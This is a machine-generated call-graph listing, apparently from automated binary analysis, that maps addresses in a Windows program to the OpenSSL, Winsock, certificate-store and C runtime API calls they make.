7ffda3333c9f EVP_CIPHER_get0_provider 122693->122695 122697 7ffda3333cbe 122693->122697 122694->122693 122695->122693 122696 7ffda3333cac EVP_CIPHER_free 122695->122696 122696->122693 122698 7ffda3333cd8 EVP_MD_get0_provider 122697->122698 122700 7ffda3333cf7 122697->122700 122698->122697 122699 7ffda3333ce5 EVP_MD_free 122698->122699 122699->122697 122701 7ffda3333d79 CRYPTO_free 122700->122701 122702 7ffda3333d10 CRYPTO_free CRYPTO_free CRYPTO_free 122700->122702 122703 7ffda3333da4 122701->122703 122704 7ffda3333ed1 10 API calls 122701->122704 122702->122701 122702->122702 122705 7ffda3333db0 9 API calls 122703->122705 122704->122678 122705->122704 122705->122705 122706->122654 122707->122660 122710 7ffda33449cc 122708->122710 122709 7ffda3344a15 122709->122666 122710->122709 122732 7ffda3343650 10 API calls 122710->122732 122712 7ffda3344a0a 122712->122666 122732->122712 122846->122682 122847->122685 122848->122687 122849 7ffda3337360 122850 7ffda33373c9 122849->122850 122851 7ffda3337365 122849->122851 122851->122850 122852 7ffda3337385 CRYPTO_free_ex_data 122851->122852 122853 7ffda33373a2 122852->122853 122854 7ffda333739c 122852->122854 122855 7ffda3333a70 89 API calls 122853->122855 122858 7ffda333d68b 122854->122858 122856 7ffda33373ab CRYPTO_THREAD_lock_free CRYPTO_free 122855->122856 122856->122850 122859 7ffda333da6d 122858->122859 122860 7ffda333d6d9 122858->122860 122859->122853 122860->122859 122861 7ffda333d700 X509_VERIFY_PARAM_free 122860->122861 122884 7ffda333c5b0 122861->122884 122863 7ffda333d71d 122864 7ffda333d724 BIO_pop 122863->122864 122865 7ffda333d757 122863->122865 122868 7ffda333d746 BIO_free 122864->122868 122887 7ffda337fd70 122865->122887 122868->122865 122869 7ffda333d7bd 122872 7ffda3343840 9 API calls 122869->122872 122870 7ffda333d7a9 122871 7ffda33449c0 10 API calls 122870->122871 122873 7ffda333d7b1 122871->122873 122874 7ffda333d7c9 CRYPTO_free 122872->122874 122875 7ffda3343840 9 API calls 122873->122875 122897 7ffda332d010 16 API calls 122874->122897 122875->122869 122877 7ffda333d7ee CRYPTO_free CRYPTO_free 122878 7ffda3333a70 89 API calls 122877->122878 122879 7ffda333d82c 11 API calls 122878->122879 122880 7ffda333d932 CRYPTO_free 122879->122880 122881 7ffda333d94b 8 API calls 122879->122881 122880->122881 122885 7ffda33aedf0 122884->122885 122886 7ffda333c5c0 OPENSSL_sk_pop_free OSSL_STACK_OF_X509_free X509_free 122885->122886 122886->122863 122889 7ffda337fd85 122887->122889 122888 7ffda337fdd6 BIO_free 122890 7ffda337fe1a 122888->122890 122889->122888 122904 7ffda33818d0 18 API calls 122889->122904 122892 7ffda337fe31 BIO_free 122890->122892 122898 7ffda3386970 122890->122898 122893 7ffda333d763 BUF_MEM_free OPENSSL_sk_free OPENSSL_sk_free OPENSSL_sk_free OPENSSL_sk_free 122892->122893 122894 7ffda337fe57 122892->122894 122893->122869 122893->122870 122905 7ffda337ed00 OPENSSL_cleanse CRYPTO_free CRYPTO_free 122894->122905 122897->122877 122900 7ffda3386980 122898->122900 122899 7ffda33869c0 122899->122892 122900->122899 122901 7ffda338699a BIO_write_ex 122900->122901 122902 7ffda33869b8 122900->122902 122901->122902 122903 7ffda3388b90 9 API calls 122902->122903 122903->122899 122904->122889 122905->122893 122906 7ffda557a4c0 122909 7ffda5586560 AcquireSRWLockExclusive 122906->122909 122908 7ffda557a4d4 122910 7ffda558659e ReleaseSRWLockExclusive 122909->122910 122911 7ffda558657a 122909->122911 122917 7ffda55c1d10 calloc 122910->122917 122935 7ffda5586e20 122911->122935 122914 7ffda5586586 122914->122910 122916 7ffda558658a ReleaseSRWLockExclusive 122914->122916 122915 7ffda55865b5 122915->122908 122916->122908 122918 7ffda55c1d47 122917->122918 122919 7ffda55c1d36 122917->122919 122920 7ffda55c1d6c 122918->122920 122921 7ffda55c1d90 free 122918->122921 122919->122915 122941 7ffda5572540 calloc 122920->122941 122923 7ffda55c1fc9 122921->122923 122923->122915 122924 7ffda55c1d78 122925 7ffda55c1d7e 122924->122925 122926 7ffda55c1d9d __acrt_iob_func __acrt_iob_func __acrt_iob_func 122924->122926 122942 7ffda55ac740 125 API calls 122925->122942 122943 7ffda559f800 memset 122926->122943 122929 7ffda55c1d8d 122929->122921 122930 7ffda55c1e8e 122944 7ffda55d0170 free 122930->122944 122932 7ffda55c1ec9 122934 7ffda55c1ed3 122932->122934 122945 7ffda55d0170 free 122932->122945 122934->122923 122936 7ffda5586e42 122935->122936 122938 7ffda5586eb3 122935->122938 122937 7ffda5586e46 calloc 122936->122937 122939 7ffda5586e9a 122936->122939 122937->122939 122938->122914 122939->122938 122946 7ffda55bb470 122939->122946 122941->122924 122942->122929 122943->122930 122944->122932 122945->122934 122947 7ffda55bb4d6 122946->122947 122948 7ffda55bb48e WSAStartup 122946->122948 122954 7ffda55bb76c 122947->122954 122955 7ffda55bb4e3 GetModuleHandleW 122947->122955 122949 7ffda55bb4b9 122948->122949 122950 7ffda55bb4a2 122948->122950 122978 7ffda55d5780 122949->122978 122950->122947 122951 7ffda55bb4b3 WSACleanup 122950->122951 122951->122949 122956 7ffda55d5780 6 API calls 122954->122956 122957 7ffda55bb51e GetProcAddress wcspbrk 122955->122957 122973 7ffda55bb512 122955->122973 122960 7ffda55bb77c 122956->122960 122958 7ffda55bb555 122957->122958 122959 7ffda55bb57d 122957->122959 122962 7ffda55bb56f LoadLibraryW 122958->122962 122966 7ffda55bb55d 122958->122966 122963 7ffda55bb5ac GetSystemDirectoryW 122959->122963 122964 7ffda55bb582 GetProcAddress 122959->122964 122960->122938 122961 7ffda55bb69e GetModuleHandleA 122965 7ffda55bb6c3 GetProcAddress GetProcAddress GetProcAddress 122961->122965 122972 7ffda55bb708 122961->122972 122962->122966 122963->122966 122968 7ffda55bb5c9 malloc 122963->122968 122964->122963 122967 7ffda55bb597 LoadLibraryW 122964->122967 122965->122972 122966->122961 122969 7ffda55bb682 GetProcAddress 122966->122969 122967->122966 122970 7ffda55bb65d free 122968->122970 122971 7ffda55bb5e2 GetSystemDirectoryW 122968->122971 122969->122961 122969->122973 122970->122966 122971->122970 122975 7ffda55bb5f2 122971->122975 122974 7ffda55bb74c QueryPerformanceFrequency 122972->122974 122973->122961 122974->122954 122976 7ffda55bb648 122975->122976 122977 7ffda55bb654 LoadLibraryW 122975->122977 122976->122970 122977->122976 122979 7ffda55d5789 122978->122979 122980 7ffda55bb4ce 122979->122980 122981 7ffda55d57d4 IsProcessorFeaturePresent 122979->122981 122980->122938 122982 7ffda55d57ec 122981->122982 122983 7ffda55d57f3 capture_previous_context 122981->122983 122982->122983 122986 7ffda55d57a0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 122983->122986 122987 7ffda5586740 122988 7ffda558674f 122987->122988 122989 7ffda558675b 122987->122989 122990 7ffda5586774 122989->122990 122991 7ffda558678c 122989->122991 123013 7ffda55830a0 6 API calls 122990->123013 122993 7ffda558679d 122991->122993 123003 7ffda55867cb 122991->123003 123014 7ffda55a4470 160 API calls 122993->123014 122994 7ffda5586780 122996 7ffda55867b2 122997 7ffda55867ba 122996->122997 122996->123003 122998 7ffda55867d4 122999 7ffda55868a1 123015 7ffda55a5610 37 API calls 122999->123015 123002 7ffda55868c1 123003->122998 123003->122999 123005 7ffda55a55e0 123003->123005 123008 7ffda55a54c0 123003->123008 123016 7ffda55a76b0 123005->123016 123082 7ffda55bf210 123008->123082 123010 7ffda55d5780 6 API calls 123011 7ffda55a55d6 123010->123011 123011->123003 123012 7ffda55a54ea 123012->123010 123013->122994 123014->122996 123015->123002 123022 7ffda55a7727 123016->123022 123055 7ffda55a7d1d 123016->123055 123017 7ffda55a773b 123018 7ffda55d5780 6 API calls 123017->123018 123020 7ffda55a55fd 123018->123020 123020->123003 123021 7ffda55a77ac 123023 7ffda55a77d3 malloc 123021->123023 123038 7ffda55a781e 123021->123038 123022->123017 123022->123055 123056 7ffda55a75c0 QueryPerformanceCounter GetTickCount 123022->123056 123024 7ffda55a77ea 123023->123024 123025 7ffda55a7819 123023->123025 123024->123017 123025->123038 123026 7ffda55a7a4c 123029 7ffda55a7a95 123026->123029 123057 7ffda55ae560 123026->123057 123027 7ffda55a79c5 WSAEventSelect 123031 7ffda55a7a68 123027->123031 123035 7ffda55a792f 123027->123035 123028 7ffda55a7972 getsockopt 123028->123035 123032 7ffda55a7cc8 123029->123032 123036 7ffda55a7aa6 WSAWaitForMultipleEvents 123029->123036 123044 7ffda55a7ac6 123029->123044 123031->123026 123033 7ffda55a7a6f free 123031->123033 123037 7ffda55a7ccf free 123032->123037 123048 7ffda55a7cda 123032->123048 123033->123026 123034 7ffda55a79af send 123034->123035 123035->123026 123035->123027 123035->123028 123035->123034 123036->123044 123037->123048 123038->123035 123039 7ffda55a7896 getsockopt 123038->123039 123040 7ffda55a78ef WSAEventSelect 123038->123040 123046 7ffda55a78d4 send 123038->123046 123039->123038 123040->123038 123043 7ffda55a7a4e 123040->123043 123041 7ffda55a7af0 WSAEnumNetworkEvents 123041->123044 123045 7ffda55a7ba2 WSAEventSelect 123041->123045 123042 7ffda55a7cb0 WSAResetEvent 123042->123032 123043->123026 123047 7ffda55a7a55 free 123043->123047 123044->123041 123044->123045 123049 7ffda55a7b5a WSAEventSelect 123044->123049 123054 7ffda55a7bfd 123044->123054 123045->123044 123046->123038 123047->123031 123048->123055 123081 7ffda55a75c0 QueryPerformanceCounter GetTickCount 123048->123081 123049->123044 123051 7ffda55a7c40 WSAEnumNetworkEvents 123053 7ffda55a7c6b WSAEventSelect 123051->123053 123051->123054 123052 7ffda55a7cab 123052->123042 123053->123051 123053->123054 123054->123042 123054->123051 123054->123052 123054->123053 123056->123021 123058 7ffda55ae59a 123057->123058 123059 7ffda55ae5b4 123057->123059 123058->123059 123072 7ffda55ae5dd 123058->123072 123060 7ffda55ae915 123059->123060 123061 7ffda55ae8fe Sleep 123059->123061 123062 7ffda55ae5c3 WSASetLastError 123059->123062 123061->123060 123067 7ffda55ae76f 123062->123067 123063 7ffda55d5780 6 API calls 123064 7ffda55ae790 123063->123064 123064->123029 123065 7ffda55ae764 WSASetLastError 123065->123067 123066 7ffda55ae748 123068 7ffda55ae7cc 123066->123068 123070 7ffda55ae757 123066->123070 123067->123063 123069 7ffda55ae7d9 select 123068->123069 123071 7ffda55ae75c 123069->123071 123070->123071 123073 7ffda55ae7b0 Sleep 123070->123073 123074 7ffda55ae7a3 WSASetLastError 123070->123074 123075 7ffda55ae820 123071->123075 123080 7ffda55ae83d 123071->123080 123072->123065 123072->123066 123073->123071 123074->123071 123075->123067 123076 7ffda55ae829 WSAGetLastError 123075->123076 123076->123067 123077 7ffda55ae8f7 123077->123061 123078 7ffda55ae897 __WSAFDIsSet 123079 7ffda55ae8b5 __WSAFDIsSet 123078->123079 123078->123080 123079->123080 123080->123077 123080->123078 123080->123079 123081->123055 123083 7ffda55bf25d GetTickCount 123082->123083 123084 7ffda55bf222 QueryPerformanceCounter 123082->123084 123083->123012 123084->123012 123085 7ffd9426a950 123119 7ffd942f9d10 123085->123119 123087 7ffd9426a99d GetModuleHandleExW 123088 7ffd9426a9bd 123087->123088 123089 7ffd9426a9d8 GetModuleFileNameW 123087->123089 123136 7ffd942ca510 8 API calls 2 library calls 123088->123136 123089->123088 123090 7ffd9426a9f1 123089->123090 123120 7ffd94248f40 104 API calls 5 library calls 123090->123120 123092 7ffd9426aba4 123094 7ffd9426aa26 123100 7ffd9426abe8 123094->123100 123113 7ffd9426aa30 123094->123113 123095 7ffd9426ac91 123096 7ffd9426adbb 123095->123096 123115 7ffd9426aca1 123095->123115 123097 7ffd942464f0 104 API calls 123096->123097 123116 7ffd9426ab0c 123096->123116 123097->123116 123098 7ffd9426ab8d 123098->123088 123100->123095 123137 7ffd94248f40 104 API calls 5 library calls 123100->123137 123101 7ffd9426ae2e 123139 7ffd942d97f4 102 API calls _invalid_parameter_noinfo_noreturn 123101->123139 123103 7ffd9426ac83 123107 7ffd942464f0 104 API calls 123103->123107 123104 7ffd9426ad66 123109 7ffd942464f0 104 API calls 123104->123109 123107->123095 123108 7ffd9426ae33 123140 7ffd942d97f4 102 API calls _invalid_parameter_noinfo_noreturn 123108->123140 123109->123116 123110 7ffd9426aafe 123122 7ffd942464f0 123110->123122 123121 7ffd94248f40 104 API calls 5 library calls 123113->123121 123138 7ffd94248f40 104 API calls 5 library calls 123115->123138 123116->123088 123116->123098 123116->123101 123116->123108 123119->123087 123120->123094 123121->123110 123126 7ffd9424651e 123122->123126 123123 7ffd94246613 123152 7ffd94242c50 104 API calls std::_Throw_Cpp_error 123123->123152 123126->123123 123127 7ffd9424660d 123126->123127 123128 7ffd9424653a ctype 123126->123128 123130 7ffd942465ad 123126->123130 123131 7ffd942465d4 123126->123131 123151 7ffd94242b80 104 API calls 2 library calls 123127->123151 123128->123116 123130->123127 123141 7ffd942ca538 123130->123141 123132 7ffd942ca538 std::_Facet_Register 104 API calls 123131->123132 123132->123128 123134 7ffd942465be 123134->123128 123150 7ffd942d97f4 102 API calls _invalid_parameter_noinfo_noreturn 123134->123150 123136->123092 123137->123103 123138->123104 123143 7ffd942ca543 123141->123143 123142 7ffd942ca55c 123142->123134 123143->123142 123145 7ffd942ca562 123143->123145 123153 7ffd942e5790 123143->123153 123146 7ffd942ca56d 123145->123146 123156 7ffd942c7b18 104 API calls Concurrency::cancel_current_task 123145->123156 123157 7ffd94242b80 104 API calls 2 library calls 123146->123157 123149 7ffd942ca573 std::_Facet_Register 123149->123134 123151->123123 123158 7ffd942e57e0 123153->123158 123157->123149 123163 7ffd942e4a90 EnterCriticalSection 123158->123163 123164 7ffda55cba86 123171 7ffda55cba8e 123164->123171 123165 7ffda55cbefb calloc 123166 7ffda55cbf1c 123165->123166 123167 7ffda55cc202 123165->123167 123286 7ffda55830a0 6 API calls 123166->123286 123172 7ffda55cc649 123167->123172 123238 7ffda55cc243 123167->123238 123168 7ffda55cbb29 123168->123165 123175 7ffda55cbb71 123168->123175 123176 7ffda55cbba3 wcschr 123168->123176 123277 7ffda55cbf4b 123168->123277 123170 7ffda55cbda5 123173 7ffda55cbf55 123170->123173 123177 7ffda55cbdbc CertOpenStore 123170->123177 123171->123168 123193 7ffda55cbb86 123171->123193 123178 7ffda55cc690 123172->123178 123263 7ffda55cc4d7 123172->123263 123293 7ffda5583190 6 API calls 123172->123293 123189 7ffda55cbf78 free 123173->123189 123190 7ffda55cbf83 123173->123190 123174 7ffda55cbf2b 123179 7ffda55cbf3b 123174->123179 123180 7ffda55cbf35 CertFreeCertificateContext 123174->123180 123175->123170 123186 7ffda55cbd76 123175->123186 123181 7ffda55cbbbc wcsncmp 123176->123181 123204 7ffda55cbd18 123176->123204 123191 7ffda55cbe4b free CryptStringToBinaryW 123177->123191 123192 7ffda55cbde4 123177->123192 123184 7ffda55cc697 123178->123184 123218 7ffda55cc6b0 123178->123218 123185 7ffda55cbf40 CertCloseStore 123179->123185 123179->123277 123180->123179 123187 7ffda55cbbdc wcschr 123181->123187 123188 7ffda55cbbe7 wcsncmp 123181->123188 123182 7ffda55d5780 6 API calls 123194 7ffda55cc941 123182->123194 123294 7ffda55830a0 6 API calls 123184->123294 123185->123277 123284 7ffda55830a0 6 API calls 123186->123284 123187->123204 123213 7ffda55cbcda 123187->123213 123188->123187 123198 7ffda55cbc09 wcsncmp 123188->123198 123189->123190 123199 7ffda55cbf8c fseek 123190->123199 123226 7ffda55cc065 123190->123226 123200 7ffda55cbea8 CertFindCertificateInStore 123191->123200 123201 7ffda55cbe91 123191->123201 123210 7ffda55cbde9 GetLastError 123192->123210 123309 7ffda55830a0 6 API calls 123193->123309 123195 7ffda55cc8e0 123308 7ffda55830a0 6 API calls 123195->123308 123198->123187 123207 7ffda55cbc2b wcsncmp 123198->123207 123208 7ffda55cbfac ftell 123199->123208 123209 7ffda55cbffd 123199->123209 123202 7ffda55cbee5 123200->123202 123203 7ffda55cbed7 free 123200->123203 123214 7ffda55cbe9a free 123201->123214 123215 7ffda55cc1ed CertCloseStore 123201->123215 123202->123215 123217 7ffda55cbeee 123202->123217 123203->123202 123204->123175 123204->123195 123205 7ffda55cc6cb strtol 123205->123218 123219 7ffda55cc6e1 strchr 123205->123219 123207->123187 123221 7ffda55cbc4a wcsncmp 123207->123221 123208->123209 123222 7ffda55cbfbb 123208->123222 123209->123222 123224 7ffda55cc002 fseek 123209->123224 123285 7ffda55830a0 6 API calls 123210->123285 123213->123204 123236 7ffda55cbcf6 _wcsdup 123213->123236 123214->123215 123215->123277 123216 7ffda55cc099 malloc 123227 7ffda55cc149 123216->123227 123228 7ffda55cc0b3 123216->123228 123217->123165 123218->123205 123235 7ffda55cc7b4 strchr 123218->123235 123248 7ffda55cc76c strncmp 123218->123248 123218->123263 123278 7ffda55cc735 strncmp 123218->123278 123219->123218 123220 7ffda55cbda0 123245 7ffda55cbe38 free 123220->123245 123220->123277 123221->123187 123232 7ffda55cbc69 wcsncmp 123221->123232 123241 7ffda55cbfcc fread 123222->123241 123242 7ffda55cc02e fclose 123222->123242 123224->123222 123234 7ffda55cc01a malloc 123224->123234 123225 7ffda55cc8fb free 123225->123277 123226->123216 123226->123226 123239 7ffda55cc157 123227->123239 123240 7ffda55cc14e free 123227->123240 123237 7ffda55cc0b8 MultiByteToWideChar 123228->123237 123274 7ffda55cc0ea 123228->123274 123229 7ffda55cc322 strchr 123229->123238 123230 7ffda55cc879 CertFreeCertificateContext 123231 7ffda55cc87f 123230->123231 123231->123277 123296 7ffda55b9b00 GetLastError _errno 123231->123296 123232->123187 123243 7ffda55cbc88 wcsncmp 123232->123243 123233 7ffda55cbe18 free 123233->123220 123244 7ffda55cbe26 free 123233->123244 123234->123222 123235->123218 123235->123263 123236->123177 123236->123204 123237->123274 123238->123229 123246 7ffda55cc469 123238->123246 123261 7ffda55cc35a strncmp 123238->123261 123238->123263 123271 7ffda55cc386 strncmp 123238->123271 123276 7ffda55cc3b7 strncmp 123238->123276 123280 7ffda55cc3eb strncmp 123238->123280 123281 7ffda55cc46b 123238->123281 123283 7ffda55cc41f strncmp 123238->123283 123249 7ffda55cc1a2 CertFindCertificateInStore 123239->123249 123250 7ffda55cc160 GetLastError 123239->123250 123240->123239 123241->123242 123251 7ffda55cbfe6 fclose 123241->123251 123253 7ffda55cc037 123242->123253 123243->123187 123252 7ffda55cbca7 wcsncmp 123243->123252 123244->123220 123245->123277 123246->123263 123270 7ffda55cc4bc 123246->123270 123248->123218 123259 7ffda55cc786 strncmp 123248->123259 123249->123217 123258 7ffda55cc1d0 GetLastError 123249->123258 123255 7ffda55cc189 123250->123255 123256 7ffda55cc173 123250->123256 123251->123253 123257 7ffda55cbff4 123251->123257 123252->123187 123252->123204 123287 7ffda55830a0 6 API calls 123253->123287 123289 7ffda55830a0 6 API calls 123255->123289 123288 7ffda55830a0 6 API calls 123256->123288 123257->123226 123290 7ffda55830a0 6 API calls 123258->123290 123259->123218 123267 7ffda55cc7dd 123259->123267 123261->123238 123263->123230 123263->123231 123295 7ffda55830a0 6 API calls 123267->123295 123268 7ffda55cc052 free 123268->123277 123292 7ffda55830a0 6 API calls 123270->123292 123271->123238 123272 7ffda55cc8a8 free 123272->123277 123273 7ffda55cc17f 123273->123277 123279 7ffda55cc136 PFXImportCertStore free 123274->123279 123276->123238 123277->123182 123278->123218 123279->123227 123280->123238 123291 7ffda55830a0 6 API calls 123281->123291 123283->123238 123283->123281 123284->123220 123285->123233 123286->123174 123287->123268 123288->123273 123289->123277 123290->123215 123291->123277 123292->123277 123293->123178 123294->123277 123295->123277 123297 7ffda55b9b40 123296->123297 123301 7ffda55b9b47 123296->123301 123298 7ffda55d5780 6 API calls 123297->123298 123299 7ffda55ba07e 123298->123299 123307 7ffda55830a0 6 API calls 123299->123307 123305 7ffda55b9ba1 123301->123305 123310 7ffda55babe0 123301->123310 123302 7ffda55ba03b _errno 123303 7ffda55ba057 GetLastError 123302->123303 123304 7ffda55ba04e _errno 123302->123304 123303->123297 123306 7ffda55ba062 SetLastError 123303->123306 123304->123303 123305->123302 123306->123297 123307->123272 123308->123225 123309->123277 123311 7ffda55bac07 123310->123311 123312 7ffda55bac0e FormatMessageW 123310->123312 123315 7ffda55d5780 6 API calls 123311->123315 123313 7ffda55bac6f strchr 123312->123313 123314 7ffda55bac4e wcstombs 123312->123314 123313->123311 123316 7ffda55bac66 123314->123316 123317 7ffda55bacb7 123315->123317 123316->123313 123317->123305 123318 7ffda5576540 123319 7ffda557657e 123318->123319 123320 7ffda5576583 123318->123320 123319->123320 123324 7ffda5576702 123319->123324 123348 7ffda5577ee0 123319->123348 123322 7ffda55d5780 6 API calls 123320->123322 123323 7ffda55767dc 123322->123323 123324->123320 123328 7ffda5576770 123324->123328 123331 7ffda557674a 123324->123331 123326 7ffda5576649 123326->123320 123327 7ffda55766cd 123326->123327 123394 7ffda55784b0 13 API calls 123326->123394 123327->123320 123396 7ffda5578620 closesocket 123327->123396 123389 7ffda55787e0 SleepEx getsockopt 123328->123389 123331->123326 123338 7ffda55787e0 3 API calls 123331->123338 123332 7ffda55765ee WSAGetLastError 123392 7ffda55784b0 13 API calls 123332->123392 123333 7ffda55765d6 connect 123333->123332 123337 7ffda5576667 WSASetLastError 123341 7ffda5576695 123337->123341 123338->123326 123339 7ffda5576602 123339->123324 123345 7ffda5576637 123339->123345 123340 7ffda557678b 123342 7ffda55bf210 2 API calls 123340->123342 123395 7ffda5583190 6 API calls 123341->123395 123343 7ffda5576795 123342->123343 123397 7ffda55784b0 13 API calls 123343->123397 123393 7ffda55786b0 6 API calls 123345->123393 123349 7ffda55bf210 2 API calls 123348->123349 123350 7ffda5577f1f 123349->123350 123398 7ffda5578740 123350->123398 123352 7ffda5577f3f 123356 7ffda5577fb0 123352->123356 123401 7ffda557b240 inet_ntop htons _errno 123352->123401 123354 7ffda5577f63 123357 7ffda5577f6b _errno _errno _errno 123354->123357 123358 7ffda5578009 123354->123358 123355 7ffda5578364 closesocket 123366 7ffda5577fe0 123355->123366 123356->123355 123356->123366 123360 7ffda5577f9b 123357->123360 123361 7ffda5578019 setsockopt 123358->123361 123362 7ffda5578047 123358->123362 123359 7ffda55d5780 6 API calls 123363 7ffda55765a4 123359->123363 123402 7ffda55830a0 6 API calls 123360->123402 123361->123362 123403 7ffda5583190 6 API calls 123362->123403 123363->123320 123363->123326 123363->123332 123363->123333 123366->123359 123367 7ffda5578064 123368 7ffda5578082 setsockopt 123367->123368 123373 7ffda55780d8 123367->123373 123369 7ffda55780af WSAGetLastError 123368->123369 123368->123373 123372 7ffda55780c6 123369->123372 123370 7ffda5578123 123376 7ffda55781b0 setsockopt 123370->123376 123383 7ffda5578283 123370->123383 123371 7ffda5578140 getsockopt 123374 7ffda5578171 setsockopt 123371->123374 123375 7ffda5578167 123371->123375 123404 7ffda5583190 6 API calls 123372->123404 123373->123370 123373->123371 123374->123370 123375->123370 123375->123374 123378 7ffda55781e0 WSAGetLastError 123376->123378 123381 7ffda55781f2 123376->123381 123379 7ffda5578275 123378->123379 123405 7ffda5583190 6 API calls 123379->123405 123382 7ffda557821e WSAIoctl 123381->123382 123382->123383 123385 7ffda5578268 WSAGetLastError 123382->123385 123383->123356 123384 7ffda557831a 123383->123384 123384->123366 123406 7ffda55784b0 13 API calls 123384->123406 123385->123379 123387 7ffda5578344 123388 7ffda55bf210 2 API calls 123387->123388 123388->123366 123390 7ffda5578831 WSAGetLastError 123389->123390 123391 7ffda5576783 123389->123391 123390->123391 123391->123326 123391->123340 123392->123339 123393->123326 123394->123337 123395->123327 123396->123320 123397->123320 123399 7ffda5578762 123398->123399 123400 7ffda557878a socket 123398->123400 123399->123352 123400->123399 123401->123354 123402->123356 123403->123367 123404->123373 123405->123383 123406->123387 123407 7ffda55a623e 123427 7ffda55ab550 123407->123427 123409 7ffda55a6250 123430 7ffda55c1530 123409->123430 123412 7ffda55a6328 123414 7ffda55ab550 2 API calls 123412->123414 123415 7ffda55a62a3 123412->123415 123414->123415 123425 7ffda55a61d5 123415->123425 123445 7ffda557b6e0 123415->123445 123418 7ffda55a60d8 123419 7ffda55a7006 123420 7ffda55a61b5 123421 7ffda55a70fe 123421->123418 123453 7ffda55a4250 6 API calls 123421->123453 123425->123418 123425->123421 123452 7ffda55c1670 37 API calls 123425->123452 123428 7ffda55bf210 2 API calls 123427->123428 123429 7ffda55ab573 123428->123429 123429->123409 123454 7ffda55ac820 free free 123430->123454 123435 7ffda55a629b 123435->123412 123435->123415 123444 7ffda5583190 6 API calls 123435->123444 123436 7ffda55ab550 2 API calls 123437 7ffda55c15b1 123436->123437 123438 7ffda55bf210 2 API calls 123437->123438 123441 7ffda55c15c1 123437->123441 123439 7ffda55c15d8 123438->123439 123439->123441 123525 7ffda557b3d0 123439->123525 123441->123435 123536 7ffda55c1670 37 API calls 123441->123536 123444->123412 123446 7ffda557b710 123445->123446 123447 7ffda55bf210 2 API calls 123446->123447 123449 7ffda557b715 123446->123449 123447->123449 123448 7ffda55d5780 6 API calls 123450 7ffda557b7f0 123448->123450 123449->123448 123450->123419 123450->123420 123450->123425 123452->123421 123453->123418 123537 7ffda55af750 123454->123537 123456 7ffda55ac870 123457 7ffda55ac8aa 123456->123457 123543 7ffda55c11c0 125 API calls 123456->123543 123461 7ffda55c2780 123457->123461 123459 7ffda55ac897 123544 7ffda55c11c0 125 API calls 123459->123544 123462 7ffda55c27cf 123461->123462 123483 7ffda55c27f1 123462->123483 123546 7ffda55c4530 123462->123546 123463 7ffda55d5780 6 API calls 123465 7ffda55c156e 123463->123465 123465->123435 123465->123436 123465->123441 123467 7ffda55c284c 123469 7ffda55c2858 _strdup 123467->123469 123470 7ffda55c286a 123467->123470 123468 7ffda55c283a _strdup 123468->123467 123468->123483 123469->123470 123469->123483 123471 7ffda55c2876 _strdup 123470->123471 123472 7ffda55c2888 123470->123472 123471->123472 123471->123483 123602 7ffda55c3180 123472->123602 123483->123463 123526 7ffda557b41d 123525->123526 123527 7ffda557b405 123525->123527 123528 7ffda557b45e 123526->123528 123529 7ffda557b42c calloc 123526->123529 123527->123526 123745 7ffda5575cd0 123527->123745 123528->123441 123531 7ffda557b450 123529->123531 123532 7ffda557b477 123529->123532 123536->123435 123538 7ffda55af766 123537->123538 123539 7ffda55af76b 123537->123539 123545 7ffda55b00a0 free 123538->123545 123540 7ffda55af7ac 123539->123540 123542 7ffda55af797 free 123539->123542 123540->123456 123542->123539 123542->123540 123543->123459 123544->123457 123545->123539 123547 7ffda55c454b 123546->123547 123548 7ffda55c456a 123546->123548 123547->123548 123549 7ffda55c4554 123547->123549 123707 7ffda55c5090 9 API calls 123548->123707 123705 7ffda55c5090 9 API calls 123549->123705 123552 7ffda55c455c 123706 7ffda55c55a0 12 API calls 123552->123706 123554 7ffda55c4568 123557 7ffda55c4572 123554->123557 123555 7ffda55c46dd 123711 7ffda55c5700 6 API calls 123555->123711 123559 7ffda55c45fd 123557->123559 123568 7ffda55c2824 123557->123568 123708 7ffda55a1800 _strdup 123557->123708 123558 7ffda55c470a 123558->123568 123712 7ffda55c5700 6 API calls 123558->123712 123559->123555 123561 7ffda55c46a2 123559->123561 123562 7ffda55c4652 123559->123562 123710 7ffda55c5700 6 API calls 123561->123710 123709 7ffda55830a0 6 API calls 123562->123709 123563 7ffda55c45db 123563->123559 123567 7ffda55c45f0 free 123563->123567 123563->123568 123566 7ffda55c46b4 123566->123555 123566->123568 123570 7ffda55c46d0 free 123566->123570 123567->123559 123568->123467 123568->123468 123568->123483 123570->123555 123571 7ffda55c48b5 123572 7ffda55c478d _strdup 123572->123568 123583 7ffda55c4725 123572->123583 123578 7ffda55c4805 free 123578->123583 123579 7ffda55c4838 free 123579->123583 123580 7ffda55c48f6 123581 7ffda55c5700 6 API calls 123581->123583 123583->123568 123583->123571 123583->123572 123583->123578 123583->123579 123583->123580 123583->123581 123585 7ffda55c487f free 123583->123585 123586 7ffda55c48d4 123583->123586 123713 7ffda55c5160 9 API calls 123583->123713 123714 7ffda5592640 10 API calls 123583->123714 123585->123583 123614 7ffda55c31c5 123602->123614 123603 7ffda55c32a5 123604 7ffda55c327e _strdup 123604->123603 123610 7ffda55c3633 free free 123614->123603 123614->123604 123614->123610 123705->123552 123706->123554 123707->123557 123708->123563 123709->123568 123710->123566 123711->123558 123712->123583 123713->123572 123714->123583 123750 7ffda5575d09 123745->123750 123753 7ffda5575dc6 123745->123753 123750->123753 123753->123526 123754 7ffda557a9d0 123755 7ffda557aa0b 123754->123755 123760 7ffda557aa00 123754->123760 123757 7ffda557aa15 123755->123757 123773 7ffda557c480 8 API calls 123755->123773 123757->123760 123762 7ffda557bcc0 123757->123762 123759 7ffda557aa54 123759->123760 123761 7ffda55ab550 2 API calls 123759->123761 123761->123760 123770 7ffda557bd20 123762->123770 123763 7ffda55bf210 2 API calls 123763->123770 123764 7ffda557be59 WSASetLastError 123764->123770 123765 7ffda557c415 123776 7ffda55830a0 6 API calls 123765->123776 123768 7ffda557c2fb 123768->123759 123769 7ffda557c2f2 123769->123768 123775 7ffda55830a0 6 API calls 123769->123775 123770->123763 123770->123764 123770->123765 123770->123768 123770->123769 123772 7ffda557b800 QueryPerformanceCounter GetTickCount 123770->123772 123774 7ffda5583190 6 API calls 123770->123774 123772->123770 123773->123757 123774->123770 123775->123768 123776->123768 123777 7ffda5578f90 123778 7ffda5578fcd 123777->123778 123779 7ffda5578fc3 123777->123779 123778->123779 123783 7ffda5575720 123778->123783 123780 7ffda5578fe5 123780->123779 123781 7ffda55bf210 2 API calls 123780->123781 123781->123779 123784 7ffda5575751 123783->123784 123785 7ffda5575740 123783->123785 123786 7ffda55bf210 2 API calls 123784->123786 